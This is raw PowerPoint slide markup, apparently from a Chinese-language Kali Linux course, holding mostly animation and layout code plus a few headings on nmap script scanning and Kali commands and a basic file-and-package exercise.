                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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p:bldP spid="81" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" bldLvl="0" animBg="1"/>
    </p:bldLst>
  </p:timing>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5" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1847711" y="1845636"/>
            <a:ext cx="2926715" cy="1638300"/>
            <a:chOff x="280807" y="-427279"/>
            <a:chExt cx="3055299" cy="2252704"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="280807" y="-427279"/>
              <a:ext cx="3055299" cy="2252704"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1263223" y="-203755"/>
              <a:ext cx="1339055" cy="1482594"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596789" y="1989833"/>
            <a:ext cx="7328535" cy="1258570"/>
            <a:chOff x="3663165" y="953426"/>
            <a:chExt cx="5496401" cy="1108953"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4060358" y="1005461"/>
              <a:ext cx="4914900" cy="622737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>脚本</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>扫描</a:t>
              </a:r>
              <a:endParaRPr sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3663165" y="953426"/>
              <a:ext cx="5496401" cy="1108953"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6146" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3531870"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.1 nmap脚本介绍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="4331970"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>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矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693420" y="2037080"/>
            <a:ext cx="9973310" cy="1392555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.在Kali Linux的桌面创建一个目录，并任意复制一个文件，将其放在这个目录中，并将文件压缩打包。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.练习在Kali Linux中下载并安装tree.deb软件包。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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5" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Kali Linux常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
